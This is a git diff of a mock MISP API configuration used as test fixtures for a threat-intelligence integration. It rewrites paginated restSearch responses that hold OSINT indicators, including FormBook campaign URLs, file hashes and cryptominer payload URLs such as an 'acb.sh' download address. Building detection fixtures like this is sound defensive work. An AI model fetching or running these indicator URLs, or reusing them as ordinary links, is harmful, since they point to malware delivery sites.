b/packages/ti_misp/_dev/deploy/docker/files/config.yml index e35e400564a..30126c00411 100644 --- a/packages/ti_misp/_dev/deploy/docker/files/config.yml +++ b/packages/ti_misp/_dev/deploy/docker/files/config.yml @@ -1,154 +1,34 @@ rules: - - path: /events/restSearch + - path: /events/restSearch # sequence 3, page 1 (repeats) methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"1","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1621599936"/ responses: - status_code: 200 body: |- { - "response": [ - { - "Event": { - "Attribute": [ - { - "Galaxy": [], - "ShadowAttribute": [], - "category": "Payload delivery", - "comment": "filename content for test event 3", - "deleted": false, - "disable_correlation": false, - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "266263", - "last_seen": null, - "object_id": "0", - "object_relation": null, - "sharing_group_id": "0", - "timestamp": "1621589229", - "to_ids": false, - "type": "filename", - "uuid": "3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3", - "value": "thetestfile.txt" - } - ], - "EventReport": [], - "Galaxy": [], - "Object": [ - { - "Attribute": [ - { - "Galaxy": [], - "ShadowAttribute": [], - "category": "Payload delivery", - "comment": "", - "deleted": false, - "disable_correlation": false, - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "266265", - "last_seen": null, - "object_id": "18207", - "object_relation": "sha256", - "sharing_group_id": "0", - "timestamp": "1621589548", - "to_ids": true, - "type": "sha256", - "uuid": "657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e", - "value": "f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee" - } - ], - "ObjectReference": [], - "comment": "File object for event 3", - "deleted": false, - "description": "File object describing a file with meta-information", - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "18207", - "last_seen": null, - "meta-category": "file", - "name": "file", - "sharing_group_id": "0", - "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", - "template_version": "22", - "timestamp": "1621589548", - "uuid": "42a88ad4-6834-46a9-a18b-aff9e078a4ea" - } - ], - "Org": { - "id": "1", - "local": true, - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "Orgc": { - "id": "1", - "local": true, - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "RelatedEvent": [ - { - "Event": { - "Org": { - "id": "1", - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "Orgc": { - "id": "1", - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "analysis": "0", - "date": "2021-05-21", - "distribution": "1", - "id": "3631", - "info": "Test event 1 just atrributes", - "org_id": "1", - "orgc_id": "1", - "published": false, - "threat_level_id": "1", - "timestamp": "1621588162", - "uuid": "8ca56ae9-3747-4172-93d2-808da1a4eaf3" - } - } - ], - "ShadowAttribute": [], - "analysis": "0", - "attribute_count": "6", - "date": "2021-05-21", - "disable_correlation": false, - "distribution": "1", - "event_creator_email": "admin@admin.test", - "extends_uuid": "", - "id": "3633", - "info": "Test event 3 objects and attributes", - "locked": false, - "org_id": "1", - "orgc_id": "1", - "proposal_email_lock": false, - "publish_timestamp": "0", - "published": false, - "sharing_group_id": "0", - "threat_level_id": "1", - "timestamp": "1621592532", - "uuid": "4edb20c7-8175-484d-bdcd-fce6872c1ef3" - } - } - ] + "response": [] + } + - path: /events/restSearch # sequence 2, page 2 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"1621592532"/ + responses: + - status_code: 200 + body: |- + { + "response": [] } - - path: /events/restSearch + - path: /events/restSearch # sequence 2, page 1 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"2","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1621592532"/ responses: - status_code: 200 body: |- @@ -239,7 +119,7 @@ rules: "published": false, "sharing_group_id": "0", "threat_level_id": "2", - "timestamp": "1621588836", + "timestamp": "1621598836", "uuid": "efbca287-edb5-4ad7-b8e4-fe9da514a763" } }, @@ -255,7 +135,7 @@ rules: "uuid": "54323f2c-e50c-4268-896c-4867950d210b", "attribute_count": "29", "analysis": "2", - "timestamp": "1412579577", + "timestamp": "1621599936", "distribution": "3", "proposal_email_lock": false, "locked": false, @@ -333,633 +213,810 @@ rules: } ] } - - path: /events/restSearch + - path: /events/restSearch # sequence 1, page 2 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"3","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: |- { "response": [] } - - path: /attributes/restSearch + - path: /events/restSearch # sequence 1, page 1 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"includeDecayScore":"true","limit":"10","page":"1","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: |- { - "response": { - "Attribute": [ - { - "id": "1", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbd-ee78-4a57-bfb8-1fda950d210b", - "timestamp": "1412320445", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://labs.opendns.com/2014/10/02/opendns-and-bash/", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } - }, - { - "id": "2", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbe-d560-4e14-9157-1fda950d210b", - "timestamp": "1412320446", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "https://gist.github.com/andrewsmhay/de1cdc63d04c2bbf8c12", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + "response": [ + { + "Event": { + "Attribute": [ + { + "Galaxy": [], + "ShadowAttribute": [], + "category": "Payload delivery", + "comment": "filename content for test event 3", + "deleted": false, + "disable_correlation": false, + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "266263", + "last_seen": null, + "object_id": "0", + "object_relation": null, + "sharing_group_id": "0", + "timestamp": "1621589229", + "to_ids": false, + "type": "filename", + "uuid": "3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3", + "value": "thetestfile.txt" } - }, - { - "id": "3", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbe-12a4-4345-b0a4-1fda950d210b", - "timestamp": "1412320446", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "https://gist.githubusercontent.com/andrewsmhay/de1cdc63d04c2bbf8c12/raw/f20402cf5a0c646c63c4521f60587703fe654443/iplist", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + ], + "EventReport": [], + "Galaxy": [], + "Object": [ + { + "Attribute": [ + { + "Galaxy": [], + "ShadowAttribute": [], + "category": "Payload delivery", + "comment": "", + "deleted": false, + "disable_correlation": false, + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "266265", + "last_seen": null, + "object_id": "18207", + "object_relation": "sha256", + "sharing_group_id": "0", + "timestamp": "1621589548", + "to_ids": true, + "type": "sha256", + "uuid": "657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e", + "value": "f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee" + } + ], + "ObjectReference": [], + "comment": "File object for event 3", + "deleted": false, + "description": "File object describing a file with meta-information", + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "18207", + "last_seen": null, + "meta-category": "file", + "name": "file", + "sharing_group_id": "0", + "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", + "template_version": "22", + "timestamp": "1621589548", + "uuid": "42a88ad4-6834-46a9-a18b-aff9e078a4ea" } + ], + "Org": { + "id": "1", + "local": true, + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "4", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "text", - "to_ids": false, - "uuid": "542e4ccc-b8fc-44af-959d-6ead950d210b", - "timestamp": "1412320460", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "Shellshock", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } + "Orgc": { + "id": "1", + "local": true, + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "5", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "comment", - "to_ids": false, - "uuid": "542e4ce7-6120-41c0-8793-e90e950d210b", - "timestamp": "1412320487", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "Data encoded by David André", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } - }, - { - "id": "266790", - "event_id": "1279", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "78f6d250-c68d-42df-8083-b55e4d20779e", - "timestamp": "1686914587", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://www.doordelivery.life/km37/", - "decay_score": [ - { - "score": -0, - "base_score": 0, - "decayed": true, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 0, - "base_score": 50, - "decayed": true, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" - }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 + "RelatedEvent": [ + { + "Event": { + "Org": { + "id": "1", + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "1056", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 + "Orgc": { + "id": "1", + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + "analysis": "0", + "date": "2021-05-21", + "distribution": "1", + "id": "3631", + "info": "Test event 1 just atrributes", + "org_id": "1", + "orgc_id": "1", + "published": false, + "threat_level_id": "1", + "timestamp": "1621588162", + "uuid": "8ca56ae9-3747-4172-93d2-808da1a4eaf3" + } + } + ], + "ShadowAttribute": [], + "analysis": "0", + "attribute_count": "6", + "date": "2021-05-21", + "disable_correlation": false, + "distribution": "1", + "event_creator_email": "admin@admin.test", + "extends_uuid": "", + "id": "3633", + "info": "Test event 3 objects and attributes", + "locked": false, + "org_id": "1", + "orgc_id": "1", + "proposal_email_lock": false, + "publish_timestamp": "0", + "published": false, + "sharing_group_id": "0", + "threat_level_id": "1", + "timestamp": "1621592532", + "uuid": "4edb20c7-8175-484d-bdcd-fce6872c1ef3" + } + } + ] + } + - path: /attributes/restSearch # sequence 3, page 1 (repeats) + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1700667505"/ + responses: + - status_code: 200 + body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 2, page 2 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"1412320446"/ + responses: + - status_code: 200 + body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 2, page 1 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1412320446"/ + responses: + - status_code: 200 + body: |- + { + "response": { + "Attribute": [ + { + "id": "3", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbe-12a4-4345-b0a4-1fda950d210b", + "timestamp": "1412320447", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "https://gist.githubusercontent.com/andrewsmhay/de1cdc63d04c2bbf8c12/raw/f20402cf5a0c646c63c4521f60587703fe654443/iplist", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "4", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "text", + "to_ids": false, + "uuid": "542e4ccc-b8fc-44af-959d-6ead950d210b", + "timestamp": "1412320460", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "Shellshock", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "5", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "comment", + "to_ids": false, + "uuid": "542e4ce7-6120-41c0-8793-e90e950d210b", + "timestamp": "1412320487", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "Data encoded by David André", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "266922", + "event_id": "1279", + "object_id": "20246", + "object_relation": "sha1", + "category": "Payload delivery", + "type": "sha1", + "to_ids": true, + "uuid": "84850997-631c-44ea-ac71-5f8bb4e6e1f0", + "timestamp": "1696914151", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "c514799ffdc38d48b7e90b8b6a324c354d1fd2a2", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "268565", - "event_id": "1294", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "ec341f4e-0f70-4569-8ac5-e35465572726", - "timestamp": "1700667504", + "Object": { + "id": "20246", "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://185.122.204.197/acb.sh", - "decay_score": [ - { - "score": 0, - "base_score": 0, - "decayed": true, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 49.98530793883329, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1294", - "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", - "orgc_id": "3", - "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + "sharing_group_id": "0" + }, + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "713", - "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "266790", + "event_id": "1279", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "78f6d250-c68d-42df-8083-b55e4d20779e", + "timestamp": "1686914587", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://www.doordelivery.life/km37/", + "decay_score": [ + { + "score": -0, + "base_score": 0, + "decayed": true, + "DecayingModel": { + "id": "1", + "name": "test-decay-model" + } + }, + { + "score": 0, + "base_score": 50, + "decayed": true, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "266793", - "event_id": "1279", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "efa8a550-bc25-4d93-abcd-1c00eaa4acdd", - "timestamp": "1686914587", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://www.blueridgebedracks.com/km37/", - "decay_score": [ - { - "score": -0, - "base_score": 0, - "decayed": false, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 0, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1056", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "266793", + "event_id": "1279", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "efa8a550-bc25-4d93-abcd-1c00eaa4acdd", + "timestamp": "1686914588", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://www.blueridgebedracks.com/km37/", + "decay_score": [ + { + "score": -0, + "base_score": 0, + "decayed": false, + "DecayingModel": { + "id": "1", + "name": "test-decay-model" + } + }, + { + "score": 0, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "268570", - "event_id": "1294", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "28f55810-c61e-42d0-8565-cc7d2e7eb57c", - "timestamp": "1700667504", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://194.38.22.53/libsystem.so", - "decay_score": [ - { - "score": 49.98530793883329, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1294", - "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", - "orgc_id": "3", - "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "713", - "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "268565", + "event_id": "1294", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "ec341f4e-0f70-4569-8ac5-e35465572726", + "timestamp": "1700667504", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://185.122.204.197/acb.sh", + "decay_score": [ + { + "score": 0, + "base_score": 0, + "decayed": true, + "DecayingModel": { + "id": "1", + "name": "test-decay-model" + } + }, + { + "score": 49.98530793883329, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1294", + "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", + "orgc_id": "3", + "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" }, - { - "id": "266922", - "event_id": "1279", - "object_id": "20246", - "object_relation": "sha1", - "category": "Payload delivery", - "type": "sha1", - "to_ids": true, - "uuid": "84850997-631c-44ea-ac71-5f8bb4e6e1f0", - "timestamp": "1696914151", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "c514799ffdc38d48b7e90b8b6a324c354d1fd2a2", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Object": { - "id": "20246", - "distribution": "5", - "sharing_group_id": "0" + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1056", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] - } + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + 